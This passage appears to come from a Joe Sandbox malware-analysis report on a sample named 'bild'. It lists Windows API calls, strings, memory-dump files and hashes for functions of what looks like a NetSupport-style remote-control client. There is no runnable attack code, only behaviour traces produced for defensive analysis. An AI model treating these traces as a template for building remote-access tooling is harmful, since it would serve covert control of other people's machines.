                                                                                    • GetLastError.KERNEL32(?,023CB898,000000FF,?), ref: 11144ED5
                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023CB898,000000FF,?), ref: 11144EE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                    • String ID:
                                                                                    • API String ID: 3768737497-0
                                                                                    • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                    • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                    • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                    • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                    Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3382485803-0
                                                                                    • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                    • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                    • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                    • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                    Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                    • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                    • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                    • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                    Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationToken
                                                                                    • String ID:
                                                                                    • API String ID: 4114910276-0
                                                                                    • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                    • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                    • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                    • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                    Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                      • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 328603210-0
                                                                                    • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                    • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                    • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                    • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                    Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __waccess_s
                                                                                    • String ID:
                                                                                    • API String ID: 4272103461-0
                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                    • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                    • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                    Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __fsopen
                                                                                    • String ID:
                                                                                    • API String ID: 3646066109-0
                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                    • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                    • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                    Function 002D1000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _NSMClient32@8.PCICL32(?,?,?,002D10A2,00000000), ref: 002D100B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4157770634.00000000002D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002D0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4157702071.00000000002D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_2d0000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Client32@8
                                                                                    • String ID:
                                                                                    • API String ID: 433899448-0
                                                                                    • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                    • Instruction ID: 88b3927b9d0ade578fc83778cf803b14d904b6032bea4da2806d72e5ab2a8e7f
                                                                                    • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                    • Instruction Fuzzy Hash: ACB092B212834DAB8714EE98E841C7B339CAA98600B00080ABD0543782CA61FC709A71

                                                                                    Non-executed Functions

                                                                                    Function 1102D330 Relevance: 70.6, APIs: 21, Strings: 19, Instructions: 575sleepfileshutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                      • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                      • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                      • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                      • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                      • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                      • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                    • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                    • SetEvent.KERNEL32(00000264), ref: 1102D3E7
                                                                                    • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                    • PostThreadMessageA.USER32(00001DB8,00000000,00000000,00000000), ref: 1102D5BC
                                                                                    • CloseHandle.KERNEL32(00000294), ref: 1102D815
                                                                                    • _free.LIBCMT ref: 1102D825
                                                                                    • _free.LIBCMT ref: 1102D841
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                    • _memset.LIBCMT ref: 1102D983
                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                    • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                    • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                    • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                    • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                    • String ID: *.*$364339$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                    • API String ID: 2369127096-1528717444
                                                                                    • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                    • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                    • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                    • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                    Function 11113290 Relevance: 44.0, APIs: 29, Instructions: 470windowsleepkeyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 111132BA
                                                                                    • GetTickCount.KERNEL32 ref: 1111332E
                                                                                    • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                    • GetClientRect.USER32(?,?), ref: 11113402
                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                    • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                    • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                    • DeleteObject.GDI32(?), ref: 11113684
                                                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                    • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                    • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                    • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                    • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                    • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                    • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                    • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                    • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                    • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                    • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                    • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                    • DeleteObject.GDI32(?), ref: 11113816
                                                                                    • DeleteObject.GDI32(?), ref: 11113820
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                    • String ID:
                                                                                    • API String ID: 879653699-0
                                                                                    • Opcode ID: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                    • Instruction ID: 189fb298e01def9bf465b0ce988e90e2b94731e78913cb033f8d66d61a6768cc
                                                                                    • Opcode Fuzzy Hash: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                    • Instruction Fuzzy Hash: E112F7B1A147099FDB14CFB8C984AAEF7F9EF88315F10452DE55A9B258DB70A841CF10
                                                                                    Function 1103B160 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 196fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
